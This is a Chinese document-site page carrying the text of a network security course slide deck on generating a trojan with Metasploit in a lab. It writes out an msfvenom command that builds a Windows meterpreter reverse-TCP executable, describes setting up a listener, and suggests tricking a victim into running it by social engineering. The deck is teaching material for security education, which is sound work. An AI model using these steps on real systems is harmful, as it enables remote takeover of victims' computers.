ImageVerifierCode 换一换
格式:PPTX , 页数:18 ,大小:603.19KB ,
文档编号:7603661      下载积分:15 文币
快捷下载
登录下载
邮箱/手机:
温馨提示:
系统将以此处填写的邮箱或者手机号生成账号和密码,方便再次下载。 如填写123,账号和密码都是123。
支付方式: 支付宝    微信支付   
验证码:   换一换

优惠套餐
 

温馨提示:若手机下载失败,请复制以下地址【https://www.163wenku.com/d-7603661.html】到电脑浏览器->登陆(账号密码均为手机号或邮箱;不要扫码登陆)->重新下载(不再收费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录  
下载须知

1: 试题类文档的标题没说有答案,则无答案;主观题也可能无答案。PPT的音视频可能无法播放。 请谨慎下单,一旦售出,概不退换。
2: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
3: 本文为用户(momomo)主动上传,所有收益归该用户。163文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

1,本文(《网络工程技术实践》课件项目五任务二木马的生成.pptx)为本站会员(momomo)主动上传,163文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。
2,用户下载本文档,所消耗的文币(积分)将全额增加到上传者的账号。
3, 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(发送邮件至3464097650@qq.com或直接QQ联系客服),我们立即给予删除!

《网络工程技术实践》课件项目五任务二木马的生成.pptx

1、1 项目五 木马攻击与防范项目五 木马攻击与防范2 项目五 木马攻击与防范【项目概述】l木马是计算机病毒的一种,已经成为数量增长最快的计算机病毒。黑客通过灰鸽子、上线远控、Ghost木马等各种“肉鸡”控制工具,疯狂侵蚀着Internet安全。为了加强对木马的防范,网络安全公司决定根据木马的特征和主要攻击方式,对整个网络进行木马扫描,加强木马防范措施。3 项目五 木马攻击与防范【项目分析】l木马也称特洛伊木马,名称来源于希腊神话木马屠城记。古希腊派大军围攻特洛伊城,久久无法攻下。于是有人献计制造一只高二丈的大木马,假装为作战马神,让精兵藏匿于巨大的木马中,大部队假装撤退而将木马摒弃于特洛伊城下。

2、城中士兵得知解围的消息后,遂将“木马”作为奇异的战利品拖入城内,全称饮酒狂欢。到午夜时分,全城军民尽入梦乡,藏于木马中的将士打开城门,四处放火,城外埋伏的士兵涌入,部队里应外合,攻下了特洛伊城。l网络攻防中的木马指的是攻击者编写的一段恶意代码,它可以潜伏在被攻击者的计算机中。攻击者通过这个代码可以远程控制被攻击者的计算机,以窃取计算机上的信息或者操作计算机。从本质上讲,木马也是病毒的一种,因此很多用户也把木马称为病毒。4 项目五 木马攻击与防范l在本项目中,将介绍木马工作的原理、典型的木马使用过程、木马的生成方法、木马免杀技术、木马防范技术,提高计算机用户对木马的认识,加强在网络使用中对木马的

3、防范意识和措施,避免在网络使用中遭受木马攻击,造成损失。l本项目主要内容如下:l1.木马的使用。l2.木马的生成。l3.木马免杀。l4.木马的防范。5 项目五 木马攻击与防范项目主要内容:任务一 木马的使用任务二 木马的生成任务三 木马免杀任务四 木马的防范6 项目五 木马攻击与防范任务二 木马的生成7 项目五 木马攻击与防范l任务描述lMetasploit软件不仅可以进行渗透攻击,而且可以生成木马。在网络攻防中,需要生成木马,然后测试木马的危害。请使用Metasploit中的载荷(msfvenom)生成一个自己的木马。l任务分析lMetasploit中的载荷是在目标计算机上执行的一段代码,m

4、sf攻击载荷生成器允许用户把载荷进行封装,生成可执行的Shellcode。l在Kali2020系统中自带有Metasploit软件,利用项目一任务二搭建的攻防平台,可以启动Metasploit,然后利用msf攻击载荷生成器生成木马。8 项目五 木马攻击与防范l任务实施l本次任务实施拓扑示意图如图5-28所示。图5-28 木马的生成任务拓扑示意图9 项目五 木马攻击与防范l1.生成木马。l步骤1 在Kali2020系统中使用msfconsole命令启动Metasploit软件,如图5-29所示。图5-29 启动Metasploit软件10 项目五 木马攻击与防范l步骤2 在Metasploit平

5、台中输入msfvenom h,查看msfvenom命令的使用方法,如图5-30所示。图5-30 查看msfvenom命令的使用方法11 项目五 木马攻击与防范l步骤3 在Metasploit平台中输入命令,生成攻击木马,如图5-31所示。图5-31 生成攻击木马12 项目五 木马攻击与防范l在图5-31中,执行命令msfvenom-p windows/meterpreter/reverse_tcp LHOST=192.168.137.102 LPORT=4444-f exe /root/test.exe将生成一个反弹木马,反弹连接的地址为192.168.137.102(即Kali2020的地址

6、),指定平台为windows/meterpreter/reverse_tcp,指定监听端口为默认端口4444,-f用来指定木马程序的输出格式,/root/test.exe是指将木马程序保存在root目录下,程序名称为test.exe。13 项目五 木马攻击与防范l步骤4 在Kali2020的/root目录下,可查看到木马程序test.exe,如图5-32所示。图5-32 查看到木马程序test.exe14 项目五 木马攻击与防范l3.进行监听设置。l步骤1 在Metasploit平台中对被攻击者进行监听前的设置,装入模块以及设置payload,如图5-33所示。图5-33 装入模块以及设置pa

7、yload15 项目五 木马攻击与防范l步骤2 查看payload选项,如图5-34所示。图5-34 查看payload选项16 项目五 木马攻击与防范l步骤3 设置payload选项,并启用攻击模块,启动反弹连接控制端,如图5-35所示。图5-35 启动反弹连接控制端该步骤实施完之后,控制端已经设置完毕,等待服务端的反弹连接。17 项目五 木马攻击与防范l4.测试木马。l将test.exe拷贝到被攻击者计算机192.168.137.131上,可以采用社会工程学、挂马等手段,诱使被攻击者运行test.exe。被攻击者运行程序后,会在攻击端发起反弹连接,如图5-36所示。图5-36 被攻击者成功发起反弹连接18 项目五 木马攻击与防范THANKS

侵权处理QQ:3464097650--上传资料QQ:3464097650

【声明】本站为“文档C2C交易模式”,即用户上传的文档直接卖给(下载)用户,本站只是网络空间服务平台,本站所有原创文档下载所得归上传人所有,如您发现上传作品侵犯了您的版权,请立刻联系我们并提供证据,我们将在3个工作日内予以改正。


163文库-Www.163Wenku.Com |网站地图|